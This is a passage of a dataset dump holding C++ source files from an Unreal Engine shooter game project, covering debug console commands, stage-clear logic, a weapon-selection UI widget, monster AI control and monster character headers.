true;\n\tASpawnActor->SetMonsterDataDivision(MakeMonsterData_Division);\n\tASpawnActor->SetHP(MakeMonsterData_Division.MHP);\n}"
//====================================================================================================================\n // Create Commands\n //====================================================================================================================\n ADD_COMMAND(eCC_SET_TARGET_STAGE_ID, TEXT(\"PG.SetTargetStageID\"), PG_CommandSetTargetStageID,\n 1,\n TEXT(\"Changes to the stage ID value at the level you are currently playing.\\n\")\n TEXT(\"(After the change, clear the stage, or start with the changed stage value when restarting.).\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_RESTART_STAGE, TEXT(\"PG.RestartStage\"), PG_CommandRestartStage,\n 1,\n TEXT(\"Restart the current stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_NEXT_STAGE, TEXT(\"PG.NextStage\"), PG_CommandNextStage,\n 1,\n TEXT(\"Start the next stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_PREV_STAGE, TEXT(\"PG.PrevStage\"), PG_CommandPrevStage,\n 1,\n TEXT(\"Start the previous stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_START_STAGE, TEXT(\"PG.StartStage\"), PG_CommandStartStage,\n 1,\n TEXT(\"Start the input stage.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_SHOW_ME_THE_MONEY, TEXT(\"PG.ShowMeTheMoney\"), PG_CommandShowMeTheMoney,\n 1,\n TEXT(\"Set Reward Point.\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe);\n\n ADD_COMMAND(eCC_ALL_STAGE_UNLOCK, TEXT(\"PG.AllStageUnlock\"), PG_CommandAllStageUnlock,\n 1,\n TEXT(\"1 : All Stage Unlock..\\n\"),\n ECVF_Scalability | ECVF_RenderThreadSafe); \n\n //====================================================================================================================\n\n#undef ADD_COMMAND\n#undef CREATE_CONSOLEVARIABLE\n}\n\nbool PG_Console::InitConsoleCommands()\n{\n m_kCommands.Init(nullptr, eCC_Max);\n\n CreateCommands();\n\n\treturn true;\n}\n\nvoid PG_Console::ReleaseCommands()\n{\n for (auto command : m_kCommands)\n {\n if (command)\n {\n IConsoleManager::Get().UnregisterConsoleObject(command->GetConsoleVariable());\n delete command;\n command = nullptr;\n }\n }\n\n m_kCommands.Reset();\n}\n\nPG_Command* PG_Console::GetCommand(class IConsoleVariable* pConsoleVariable)\n{\n for (auto command : m_kCommands)\n {\n if (nullptr == command)\n continue;\n\n if (command->GetConsoleVariable() == pConsoleVariable)\n return command;\n }\n\n return nullptr;\n}\n\nvoid PG_Console::UpdateCommands()\n{\n for (auto command : m_kCommands)\n {\n if (nullptr == command)\n continue;\n\n command->UpdateCommand();\n }\n}\n" }, { "alpha_fraction": 0.7844564318656921, "alphanum_fraction": 0.7846912145614624, "avg_line_length": 31.51908302307129, "blob_id": "3c2920c005f47f9b38645cefb8647ba838812f18", "content_id": "831936be1ae88458184d4a62417accba70d0a154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4373, "license_type": "no_license", "max_line_length": 104, "num_lines": 131, "path": "/Source/Project_Gun/Private/Game/GameMode/PG_GameModeStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include 
\"Character/PG_MyChar.h\"\n#include \"SaveData/PG_SaveStageData.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\nAPG_GameModeStage::APG_GameModeStage()\n{\n\tDefaultPawnClass = APG_MyChar::StaticClass();\n\tPlayerControllerClass = APG_PlayerController::StaticClass();\n\tGameStateClass = APG_GameStateStage::StaticClass();\n\tPlayerStateClass = APG_MyPlayerState::StaticClass();\n}\n\nvoid APG_GameModeStage::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_GameModeStage::PostLogin(APlayerController* NewPlayer)\n{\n\tSuper::PostLogin(NewPlayer);\n}\n\nvoid APG_GameModeStage::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\n\nbool APG_GameModeStage::IsClearMission(enum EStageClearType a_ekStageClearType)\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, false);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tconst FPGStageData*\tcpStageData = pGameInstance->GetTableStageData(m_pSelectSaveStageData->m_nStageID);\n\tABCHECK(nullptr != cpStageData, false);\n\n\tswitch (a_ekStageClearType)\n\t{\n\tcase EStageClearType::eSCT_AmountKill:\n\t\treturn (pGameStateStage->GetStagePlayData()->NumberOfMonstersKilled >= cpStageData->M_Amount);\n\tcase EStageClearType::eSCT_ClearTime:\n\t\treturn (IsClearMission(EStageClearType::eSCT_Lethal) && (pGameStateStage->GetRemainStageTimer() > 0));\n\tcase EStageClearType::eSCT_Lethal:\n\t\treturn (pGameStateStage->GetMaxLethalKill() >= cpStageData->Multi_Kill);\n\t}\n\n\tABLOG(Error, TEXT(\"Can't find MisiionType\"));\n\treturn false;\n}\n\nbool APG_GameModeStage::IsWasClearMisiion(enum EStageClearType a_ekStageClearType)\n{\n\tABCHECK(nullptr != m_pSelectSaveStageData, false);\n\n\tswitch (a_ekStageClearType)\n\t{\n\tcase EStageClearType::eSCT_AmountKill:\n\t\treturn m_pSelectSaveStageData->m_bWasClearAmount;\n\tcase EStageClearType::eSCT_ClearTime:\n\t\treturn m_pSelectSaveStageData->m_bWasClearTime;\n\tcase EStageClearType::eSCT_Lethal:\n\t\treturn m_pSelectSaveStageData->m_bWasClearLethal;\n\t}\n\n\tABLOG(Error, TEXT(\"Can't find MisiionType\"));\n\treturn false;\n}\n\nbool APG_GameModeStage::IsStageClear()\n{\n\t// 모든 몬스터를 죽여야 스테이지 클리어 가능하다.\n\t// 필살기 킬수나 제한시간은 부수적인 스테이지 클리어 조건이기 때문에 검사하지 않는다.\n\treturn IsClearMission(EStageClearType::eSCT_AmountKill);\n}\n\nbool APG_GameModeStage::SavePlayerData()\n{\n\tauto pPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pPlayerState, false);\n\n\tABCHECK(SetSavePlayerData(*pPlayerState->GetPlayingPlayerData()), false);\n\n\treturn APG_GameModeBase::SavePlayerData();\n}\n\nbool APG_GameModeStage::SaveStageData()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage, false);\n\n\tABCHECK(SetSaveStageData(*pGameStateStage->GetStagePlayData()), false);\n\n\treturn APG_GameModeBase::SaveStageData();\n}\n\nbool APG_GameModeStage::SetSavePlayerData(const struct FPGPlayerData& a_rkPlayerData)\n{\n\tABCHECK(nullptr != m_pSavePlayerData, false);\n\tm_pSavePlayerData->m_nRewardPoint = a_rkPlayerData.RewardPoint;\n\t//m_pSavePlayerData->m_nEquipWeaponSlotIndex = a_rkPlayerData.EquipWeaponInventoryIndex;\n\t//m_pSavePlayerData->m_kEquipWeaponClass = a_rkPlayerData.EquipWeaponClass;\n\n\treturn true;\n}\n\nbool APG_GameModeStage::SetSaveStageData(const FPGStagePlayData& a_rkStagePlayData)\n{\n\tABCHECK(nullptr != 
m_pSelectSaveStageData, false);\n\tm_pSelectSaveStageData->m_kStagePlayData = a_rkStagePlayData;\n\n\tif (false == m_pSelectSaveStageData->m_bWasClearAmount)\n\t\tm_pSelectSaveStageData->m_bWasClearAmount = IsClearMission(EStageClearType::eSCT_AmountKill);\n\n\tif (false == m_pSelectSaveStageData->m_bWasClearTime)\n\t\tm_pSelectSaveStageData->m_bWasClearTime = IsClearMission(EStageClearType::eSCT_ClearTime);\n\n\tif (false == m_pSelectSaveStageData->m_bWasClearLethal)\n\t\tm_pSelectSaveStageData->m_bWasClearLethal = IsClearMission(EStageClearType::eSCT_Lethal);\n\n\treturn true;\n}" }, { "alpha_fraction": 0.7776365876197815, "alphanum_fraction": 0.7852604985237122, "avg_line_length": 32.56398010253906, "blob_id": "cfe7a130b6c050d831f996cd533e9152b745fe18", "content_id": "98f315626fc8b97b98b7e8f26a90ec65d2824174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7093, "license_type": "no_license", "max_line_length": 124, "num_lines": 211, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetPlayStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetPlayStage.h\"\n#include \"UI/PG_UserWidgetStageClearTarget.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <Components/Overlay.h>\n\nvoid UPG_UserWidgetPlayStage::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != WB_StageClearTarget);\n\tABCHECK(nullptr != WB_WeaponBox_0);\n\tABCHECK(nullptr != WB_WeaponBox_1);\n\tABCHECK(nullptr != WB_WeaponBox_2);\n\tABCHECK(nullptr != SelectWeapon_0);\n\tABCHECK(nullptr != SelectWeapon_1);\n\tABCHECK(nullptr != SelectWeapon_2);\n\n\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tif (MyPlayerState)\n\t{\n\t\tMyPlayerState->OnUpdateRewardPoint.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeRewardPoint);\n\t}\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (GameStateStage)\n\t{\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayStage::OnUpdateFlag);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayStage::OnUpdateLethal);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayStage::OnUpdateTime);\n\t}\n\n\tWB_WeaponBox_0->SetSlotIndex(0);\n\tWB_WeaponBox_0->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex);\n\tWB_WeaponBox_1->SetSlotIndex(1);\n\tWB_WeaponBox_1->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex);\n\tWB_WeaponBox_2->SetSlotIndex(2);\n\tWB_WeaponBox_2->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex);\n}\n\nvoid UPG_UserWidgetPlayStage::InitWeaponBoxData()\n{\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tauto pMyPlayerData = pMyPlayerState->GetPlayingPlayerData();\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tfor (int32 nSlotIndex = 0; 
nSlotIndex < pMyPlayerData->PlayerWeaponInventory.Num(); ++nSlotIndex)\n\t{\n\t\tint32 nAmmo = pGameMode->GetMaxAmmo(pMyPlayerData->PlayerWeaponInventory[nSlotIndex]);\n\t\tif (nSlotIndex == PG_MAX_WEAPON_SLOT - 1)\n\t\t{\n\t\t\t// 유료 슬롯\n\t\t\tInitWeaponBoxData(pMyPlayerData->bExtendWeaponSlot, nSlotIndex, pMyPlayerData->PlayerWeaponInventory[nSlotIndex], nAmmo);\n\t\t}\n\t\telse\n\t\t{\n\t\t\tInitWeaponBoxData(true, nSlotIndex, pMyPlayerData->PlayerWeaponInventory[nSlotIndex], nAmmo);\n\t\t}\n\t}\n\n\tSetSelectWeapon(pMyPlayerData->EquipWeaponInventoryIndex);\n\n\tOnUpdateFlag();\n\tOnUpdateLethal();\n\tOnUpdateTime();\n\tOnChangeRewardPoint();\n}\n\nbool UPG_UserWidgetPlayStage::InitWeaponBoxData(bool bEnable, int32 nSlotIndex, int32 nWeaponTableIndex, int32 nAmmo)\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage, false);\n\n\tauto pUserWidgetWeaponBox = GetUserWidgetWeaponBox(nSlotIndex);\n\tABCHECK(nullptr != pUserWidgetWeaponBox, false);\n\n\tpUserWidgetWeaponBox->SetWeaponIndex(pGameModeStage, nWeaponTableIndex);\n\tpUserWidgetWeaponBox->SetAmmo(nAmmo);\n\tpUserWidgetWeaponBox->SetEnable(bEnable);\n\n\treturn true;\n}\n\nvoid UPG_UserWidgetPlayStage::SetSelectWeapon(int32 nSlotIndex)\n{\n\tfor (int32 nIndex = 0; nIndex < eMaxWeaponSlotIndex; ++nIndex)\n\t{\n\t\tauto pOverlaySelectWeapon = GetOverlaySelectWeapon(nIndex);\n\t\tif (pOverlaySelectWeapon)\n\t\t{\n\t\t\tbool bSelect = (nIndex == nSlotIndex);\n\t\t\tif (bSelect)\n\t\t\t\tpOverlaySelectWeapon->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\telse\n\t\t\t\tpOverlaySelectWeapon->SetVisibility(ESlateVisibility::Hidden);\n\t\t}\n\t}\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateWeaponAmmo(int32 nSlotIndex, int32 nAmmo)\n{\n\tauto pUserWidgetWeaponBox = GetUserWidgetWeaponBox(nSlotIndex);\n\tABCHECK(nullptr != pUserWidgetWeaponBox);\n\n\tpUserWidgetWeaponBox->SetAmmo(nAmmo);\n}\n\nvoid UPG_UserWidgetPlayStage::OnChangeEquipWeaponIndex(int32 nSlotIndex)\n{\n\tauto pUserWidgetWeaponBox = GetUserWidgetWeaponBox(nSlotIndex);\n\tABCHECK(nullptr != pUserWidgetWeaponBox);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tif (pMyPlayerState->ChangeWeapon(nSlotIndex, pUserWidgetWeaponBox->GetWeaponIndex()))\n\t{\n\t\tSetSelectWeapon(nSlotIndex);\n\t}\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateFlag()\n{\n\tABCHECK(nullptr != WB_StageClearTarget);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\t\n\tWB_StageClearTarget->SetDataFlag(pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill), \n\t\tpStagePlayData->NumberOfMonstersKilled, \n\t\tpStagePlayData->NumberOfMonsters);\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateLethal()\n{\n\tABCHECK(nullptr != WB_StageClearTarget);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != 
pStagePlayData);\n\n\tWB_StageClearTarget->SetDataLethal(pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal), \n\t\tpStagePlayData->NumberOfMonstersMuiltiKilled, \n\t\tpStagePlayData->NumberOfMonstersMuiltiKill);\n}\n\nvoid UPG_UserWidgetPlayStage::OnUpdateTime()\n{\n\tABCHECK(nullptr != WB_StageClearTarget);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tWB_StageClearTarget->SetDataTime(pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime),\n\t\tpStagePlayData->RemainTime);\n}\n\nUPG_UserWidgetWeaponBox* UPG_UserWidgetPlayStage::GetUserWidgetWeaponBox(int32 nSlotIndex)\n{\n\tUPG_UserWidgetWeaponBox* pWeaponBox = nullptr;\n\tif (0 == nSlotIndex)\n\t\tpWeaponBox = WB_WeaponBox_0;\n\telse if (1 == nSlotIndex)\n\t\tpWeaponBox = WB_WeaponBox_1;\n\telse if (2 == nSlotIndex)\n\t\tpWeaponBox = WB_WeaponBox_2;\n\n\treturn pWeaponBox;\n}\n\nUOverlay* UPG_UserWidgetPlayStage::GetOverlaySelectWeapon(int32 nSlotIndex)\n{\n\tUOverlay* pOverlaySelectWeapon = nullptr;\n\tif (0 == nSlotIndex)\n\t\tpOverlaySelectWeapon = SelectWeapon_0;\n\telse if (1 == nSlotIndex)\n\t\tpOverlaySelectWeapon = SelectWeapon_1;\n\telse if (2 == nSlotIndex)\n\t\tpOverlaySelectWeapon = SelectWeapon_2;\n\n\treturn pOverlaySelectWeapon;\n}\n\n" }, { "alpha_fraction": 0.7510548233985901, "alphanum_fraction": 0.7510548233985901, "avg_line_length": 25.33333396911621, "blob_id": "d5c9cadceda4ed13f3fbad27bae270d1b828d30c", "content_id": "48eedd875e40e54fed8f3a32d36c61768075c737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1898, "license_type": "no_license", "max_line_length": 113, "num_lines": 72, "path": "/Source/Project_Gun/Private/AI/PG_AICon_Mon.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"AI/PG_AICon_Mon.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <BehaviorTree/BehaviorTree.h>\n#include <BehaviorTree/BlackboardData.h>\n#include <BehaviorTree/BlackboardComponent.h>\n\nconst FName APG_AICon_Mon::HomePosKey(TEXT(\"HomePos\"));\nconst FName APG_AICon_Mon::TargetKey(TEXT(\"Target\"));\nconst FName APG_AICon_Mon::DetectRangeKey(TEXT(\"MDetectRange\"));\nconst FName APG_AICon_Mon::ChaseRangeKey(TEXT(\"MChaseRange\"));\n\nAPG_AICon_Mon::APG_AICon_Mon()\n{\n\tstatic ConstructorHelpers::FObjectFinder<UBlackboardData> BBObject(TEXT(\"/Game/PG/AI/BB_Mon.BB_Mon\"));\n\tif (BBObject.Succeeded())\n\t{\n\t\tBBAsset = BBObject.Object;\n\t}\n\n\tstatic ConstructorHelpers::FObjectFinder<UBehaviorTree> BTObject(TEXT(\"/Game/PG/AI/BT_MonNormal.BT_MonNormal\"));\n\tif (BTObject.Succeeded())\n\t{\n\t\tBTAsset = BTObject.Object;\n\t}\n}\n\nvoid APG_AICon_Mon::OnPossess(APawn* InPawn)\n{\n\tSuper::OnPossess(InPawn);\n}\n\nbool APG_AICon_Mon::RunAI()\n{\n\tABCHECK(UseBlackboard(BBAsset, Blackboard), false);\n\tABCHECK(SetBlackboardValue(), false);\n\n\tif (!RunBehaviorTree(BTAsset))\n\t{\n\t\tABLOG(Error, TEXT(\"AIController couldn't run behavior tree!\"));\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nvoid APG_AICon_Mon::StopAI()\n{\n\tauto BehaviorTreeComponent = Cast<UBehaviorTreeComponent>(BrainComponent);\n\tif 
(nullptr != BehaviorTreeComponent)\n\t{\n\t\tBehaviorTreeComponent->StopTree(EBTStopMode::Safe);\n\t\t//StopMovement();\n\t}\n}\n\nbool APG_AICon_Mon::SetBlackboardValue()\n{\n\tABCHECK(nullptr != Blackboard, false);\n\n\tauto MonsterCharacter = Cast<APG_MonChar>(GetPawn());\n\tif (nullptr == MonsterCharacter)\n\t\treturn false;\n\n\tBlackboard->SetValueAsVector(HomePosKey, GetPawn()->GetActorLocation());\n\tBlackboard->SetValueAsInt(DetectRangeKey, MonsterCharacter->GetDetectRange());\n\tBlackboard->SetValueAsInt(ChaseRangeKey, MonsterCharacter->GetChaseRange());\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.7102803587913513, "alphanum_fraction": 0.7102803587913513, "avg_line_length": 14.285714149475098, "blob_id": "ab949917783a8110cce0007a7e73972203dd467c", "content_id": "45200bea196b10b7021bb39f908bda1e39ef8b02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 323, "license_type": "no_license", "max_line_length": 79, "num_lines": 21, "path": "/Source/Project_Gun/Public/Anim/PG_AnimIns_Mon.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Animation/AnimInstance.h>\n#include \"PG_AnimIns_Mon.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_AnimIns_Mon : public UAnimInstance\n{\n\tGENERATED_BODY()\n\t\n\t\n\t\n\t\n};\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7766884565353394, "avg_line_length": 18.95652198791504, "blob_id": "e0f93b0fded5567bca3a5241752c83ef8d7e8dc4", "content_id": "85c46e3845a663216fab17861c58aa934dc5d764", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 920, "license_type": "no_license", "max_line_length": 117, "num_lines": 46, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetWeaponInventory.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetWeaponInventory.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE_TwoParams(FOnBtnClickedClose, int32, int32);\t// FOnBtnClickedClose, SlotIndex, WeaponIndex\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetWeaponInventory : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\tenum\n\t{\n\t\teMaxInvenIndex = 6,\n\t};\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponInventory();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetOpenSlotIndex(int32 nSlotIndex);\n\nprotected :\n\tUFUNCTION()\n\tvoid OnSelectWeaponIndex(int32 nWeaponIndex);\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnClose();\n\npublic :\n\tFOnBtnClickedClose OnBtnClickedClose;\n\nprivate:\n\tint32 m_nOpenSlotIndex = PG_INVALID_INDEX;\n};\n" }, { "alpha_fraction": 0.7820823192596436, "alphanum_fraction": 0.7820823192596436, "avg_line_length": 24.030303955078125, "blob_id": "c165a4c682b1835126099e7ca071df9545aaa207", "content_id": "d750fa196cde991ef9b4d52ab909cb56fd0f8e9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 828, "license_type": "no_license", "max_line_length": 89, "num_lines": 33, "path": "/Source/Project_Gun/Public/Character/PG_MonCharDivisionSkillType.h", 
"repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharDivisionSkillType.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharDivisionSkillType : public APG_MonChar\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MonCharDivisionSkillType();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\nprotected:\n\tUPROPERTY(VisibleInstanceOnly, Category = \"PG MonsterComponent\")\n\tclass UPG_ComponentDivisionSpawn* CharDivisionComponent;\n\n\tUPROPERTY(EditAnywhere, Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_DivisionSkillType MonsterDivisionSkillTypeData;\n\t\n};\n" }, { "alpha_fraction": 0.6226749420166016, "alphanum_fraction": 0.6238559484481812, "avg_line_length": 32.869998931884766, "blob_id": "9098508b4fb71dd13dd628e8427a2149e6d4d3ae", "content_id": "0aaa36fbe25ee892221465b9fb8ebbf76ff18ca7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3665, "license_type": "no_license", "max_line_length": 165, "num_lines": 100, "path": "/Source/Project_Gun/Public/Character/PG_MonCharSkillType.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharSkillType.generated.h\"\n\n/**\n *\n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharSkillType : public APG_MonChar\n{\n\tGENERATED_BODY()\n\npublic:\n\tAPG_MonCharSkillType();\n\n\tvirtual void Tick(float DeltaTime) override;\n\nprotected :\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\tvirtual void OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit) override;\n\npublic :\n\t//=============================================\n\t// Weapon\n\t//=============================================\n\tvoid\tFireWeapon();\n\n\t//=============================================\n\t// Dash\n\t//=============================================\n\tvoid\tDash(FVector vTarget);\n\tfloat\tGetDashDistaceScale();\n\n\t//=============================================\n\t// Division\n\t//=============================================\n\tvoid\tSetMonsterDataDivision(FPGMonsterData_SkillType& MonsterData_SkillType);\n\tbool\tIsPossibleToDivision();\t\t\t\t// 분할 가능한지 검사\n\tint32\tGetDivisionCountToHPRatio();\t\t// 현재 몬스터의 남은 체력 기준, 분할 할 수 있는 횟수를 반환한다.\n\nprotected :\n\tvoid UpdateWeaponSystem();\n\tvoid UpdateDashSystem();\n\n\tbool FindTargetToMyCharForWeapon();\n\tbool FindTargetToMyCharForDash(OUT FVector& vGetTargetPos);\n\nprotected:\n\tvirtual bool OnDamage(int32 nDamage, bool IsUseLetharAttack = false) override;\n\tvoid OnEndWeaponFireCoolTime();\t// 무기 발사 쿨타임 종료\n\tvoid OnStartDash();\t\t\t\t// 대쉬 시작\n\tUFUNCTION()\n\tvoid OnEndDash();\t\t\t\t// 대쉬 종료\n\tvoid OnEndDashCoolTime();\t\t// 대쉬 쿨타임 종료\n\npublic :\n\t// 스폰되면 생성된 몬스터 액터가 호출된다.\n\tvoid OnSpawnActor(APG_MonCharSkillType* ASpawnActor);\n\nprivate:\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, 
Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_SkillType MonsterSkillTypeData;\n\n\t//=============================================\n\t// Weapon\n\t//=============================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG Weapon MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UPG_ComponentWeapon* WeaponComponent;\n\tbool\t\t\tm_bEquipWeapon = false;\t\t\t// 무기 사용 가능여부\n\tbool\t\t\tm_bCanWeaponFire = false;\t\t// 무기 발사 사용여부\n\tFTimerHandle\tHandleWeaponCoolTime;\t\t\t// 무기 발사 쿨타임\n\n\t//=============================================\n\t// Dash\n\t//=============================================\n\tUPROPERTY(VisibleAnywhere, Category = \"PG Dash MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UPG_ComponentDash* DashComponent;\n\tUPROPERTY(EditAnywhere, Category = \"PG Dash MonsterComponent\", Meta = (AllowPrivateAccess = true))\n\tclass UStaticMeshComponent* PreviewMeshComponent;\n\tbool\t\t\tm_bOnHitBlocking = false;\t\t// 대쉬 중 장애물에 부딪힘\n\tbool\t\t\tm_bEquipDash = false;\t\t\t// 대쉬 사용 가능여부\n\tbool\t\t\tm_bCanDash = false;\t\t\t\t// 대쉬 활성화 여부\n\tFTimerHandle\tHandleDashDelayTime;\t\t\t// 대쉬 딜레이 타임\n\tFTimerHandle\tHandleDashTime;\t\t\t\t\t// 대쉬 시간\n\tFTimerHandle\tHandleDashCoolTime;\t\t\t\t// 대쉬 